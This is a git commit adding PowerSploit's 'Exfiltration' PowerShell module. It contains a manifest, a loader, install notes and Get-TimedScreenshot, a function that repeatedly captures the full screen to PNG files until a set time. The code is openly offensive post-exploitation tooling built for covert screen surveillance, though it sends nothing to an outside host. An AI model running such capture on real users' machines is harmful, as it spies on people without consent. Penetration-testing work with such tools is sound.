Added 'Exfiltration' Module
This commit is contained in:
bitform
parent
b53b6a03a5
commit
b3bbe03e93
|
|
@ -0,0 +1,87 @@
|
||||||
|
@{
|
||||||
|
|
||||||
|
# Script module or binary module file associated with this manifest.
|
||||||
|
ModuleToProcess = 'Exfiltration.psm1'
|
||||||
|
|
||||||
|
# Version number of this module.
|
||||||
|
ModuleVersion = '1.0.0.0'
|
||||||
|
|
||||||
|
# ID used to uniquely identify this module
|
||||||
|
GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'
|
||||||
|
|
||||||
|
# Author of this module
|
||||||
|
Author = 'Matthew Graeber'
|
||||||
|
|
||||||
|
# Company or vendor of this module
|
||||||
|
CompanyName = ''
|
||||||
|
|
||||||
|
# Copyright statement for this module
|
||||||
|
Copyright = 'BSD 3-Clause'
|
||||||
|
|
||||||
|
# Description of the functionality provided by this module
|
||||||
|
Description = 'PowerSploit Exfiltration Module'
|
||||||
|
|
||||||
|
# Minimum version of the Windows PowerShell engine required by this module
|
||||||
|
PowerShellVersion = '2.0'
|
||||||
|
|
||||||
|
# Name of the Windows PowerShell host required by this module
|
||||||
|
# PowerShellHostName = ''
|
||||||
|
|
||||||
|
# Minimum version of the Windows PowerShell host required by this module
|
||||||
|
# PowerShellHostVersion = ''
|
||||||
|
|
||||||
|
# Minimum version of the .NET Framework required by this module
|
||||||
|
# DotNetFrameworkVersion = ''
|
||||||
|
|
||||||
|
# Minimum version of the common language runtime (CLR) required by this module
|
||||||
|
# CLRVersion = ''
|
||||||
|
|
||||||
|
# Processor architecture (None, X86, Amd64) required by this module
|
||||||
|
# ProcessorArchitecture = ''
|
||||||
|
|
||||||
|
# Modules that must be imported into the global environment prior to importing this module
|
||||||
|
# RequiredModules = @()
|
||||||
|
|
||||||
|
# Assemblies that must be loaded prior to importing this module
|
||||||
|
# RequiredAssemblies = @()
|
||||||
|
|
||||||
|
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
|
||||||
|
# ScriptsToProcess = ''
|
||||||
|
|
||||||
|
# Type files (.ps1xml) to be loaded when importing this module
|
||||||
|
# TypesToProcess = @()
|
||||||
|
|
||||||
|
# Format files (.ps1xml) to be loaded when importing this module
|
||||||
|
# FormatsToProcess = @()
|
||||||
|
|
||||||
|
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
|
||||||
|
# NestedModules = @()
|
||||||
|
|
||||||
|
# Functions to export from this module
|
||||||
|
FunctionsToExport = '*'
|
||||||
|
|
||||||
|
# Cmdlets to export from this module
|
||||||
|
CmdletsToExport = '*'
|
||||||
|
|
||||||
|
# Variables to export from this module
|
||||||
|
VariablesToExport = ''
|
||||||
|
|
||||||
|
# Aliases to export from this module
|
||||||
|
AliasesToExport = ''
|
||||||
|
|
||||||
|
# List of all modules packaged with this module.
|
||||||
|
ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'})
|
||||||
|
|
||||||
|
# List of all files packaged with this module
|
||||||
|
FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Usage.md'
|
||||||
|
|
||||||
|
# Private data to pass to the module specified in RootModule/ModuleToProcess
|
||||||
|
# PrivateData = ''
|
||||||
|
|
||||||
|
# HelpInfo URI of this module
|
||||||
|
# HelpInfoURI = ''
|
||||||
|
|
||||||
|
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
|
||||||
|
# DefaultCommandPrefix = ''
|
||||||
|
|
||||||
|
}
|
||||||
|
|
@ -0,0 +1 @@
|
||||||
|
Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
|
||||||
|
|
@ -0,0 +1,99 @@
|
||||||
|
Function Get-TimedScreenshot {
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
|
||||||
|
Get-TimedScreenshot
|
||||||
|
|
||||||
|
Author: Chris Campbell (@obscuresec)
|
||||||
|
License: BSD 3-Clause
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
|
||||||
|
A function that takes screenshots and saves them to a folder.
|
||||||
|
|
||||||
|
.PARAMETER $Path
|
||||||
|
|
||||||
|
Specifies the folder path.
|
||||||
|
|
||||||
|
.PARAMETER $Interval
|
||||||
|
|
||||||
|
Specifies the interval in seconds between taking screenshots.
|
||||||
|
|
||||||
|
.PARAMETER $EndTime
|
||||||
|
|
||||||
|
Specifies when the script should stop running in the format HH-MM
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
|
||||||
|
PS C:\> Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
|
||||||
|
http://obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html
|
||||||
|
https://github.com/obscuresec/random/blob/master/Get-TimedScreenshot
|
||||||
|
|
||||||
|
#>
|
||||||
|
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Mandatory=$True)]
|
||||||
|
[ValidateScript({Test-Path -Path $_ })]
|
||||||
|
[string] $Path,
|
||||||
|
|
||||||
|
[Parameter(Mandatory=$True)]
|
||||||
|
[int32] $Interval,
|
||||||
|
|
||||||
|
[Parameter(Mandatory=$True)]
|
||||||
|
[string] $EndTime
|
||||||
|
)
|
||||||
|
|
||||||
|
#Define helper function that generates and saves screenshot
|
||||||
|
Function GenScreenshot {
|
||||||
|
$ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen
|
||||||
|
$ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height
|
||||||
|
$DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject)
|
||||||
|
$DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size)
|
||||||
|
$DrawingGraphics.Dispose()
|
||||||
|
$ScreenshotObject.Save($FilePath)
|
||||||
|
$ScreenshotObject.Dispose()
|
||||||
|
}
|
||||||
|
|
||||||
|
Try {
|
||||||
|
|
||||||
|
#load required assembly
|
||||||
|
Add-Type -Assembly System.Windows.Forms
|
||||||
|
|
||||||
|
Do {
|
||||||
|
#get the current time and build the filename from it
|
||||||
|
$Time = (Get-Date)
|
||||||
|
|
||||||
|
[string] $FileName = "$($Time.Month)"
|
||||||
|
$FileName += '-'
|
||||||
|
$FileName += "$($Time.Day)"
|
||||||
|
$FileName += '-'
|
||||||
|
$FileName += "$($Time.Year)"
|
||||||
|
$FileName += '-'
|
||||||
|
$FileName += "$($Time.Hour)"
|
||||||
|
$FileName += '-'
|
||||||
|
$FileName += "$($Time.Minute)"
|
||||||
|
$FileName += '-'
|
||||||
|
$FileName += "$($Time.Second)"
|
||||||
|
$FileName += '.png'
|
||||||
|
|
||||||
|
#use join-path to add path to filename
|
||||||
|
[string] $FilePath = (Join-Path $Path $FileName)
|
||||||
|
|
||||||
|
#run screenshot function
|
||||||
|
GenScreenshot
|
||||||
|
|
||||||
|
Write-Verbose "Saved screenshot to $FilePath. Sleeping for $Interval seconds"
|
||||||
|
|
||||||
|
Start-Sleep -Seconds $Interval
|
||||||
|
}
|
||||||
|
|
||||||
|
#note that this will run once regardless if the specified time as passed
|
||||||
|
While ((Get-Date -Format HH:%m) -lt $EndTime)
|
||||||
|
}
|
||||||
|
|
||||||
|
Catch {Write-Warning "$Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage"}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
@ -0,0 +1,12 @@
|
||||||
|
To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
|
||||||
|
|
||||||
|
The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
|
||||||
|
The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
|
||||||
|
|
||||||
|
To use the module, type `Import-Module Exfiltration`
|
||||||
|
|
||||||
|
To see the commands imported, type `Get-Command -Module Exfiltration`
|
||||||
|
|
||||||
|
For help on each individual command, Get-Help is your friend.
|
||||||
|
|
||||||
|
Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
|
||||||
Loading…
Reference in New Issue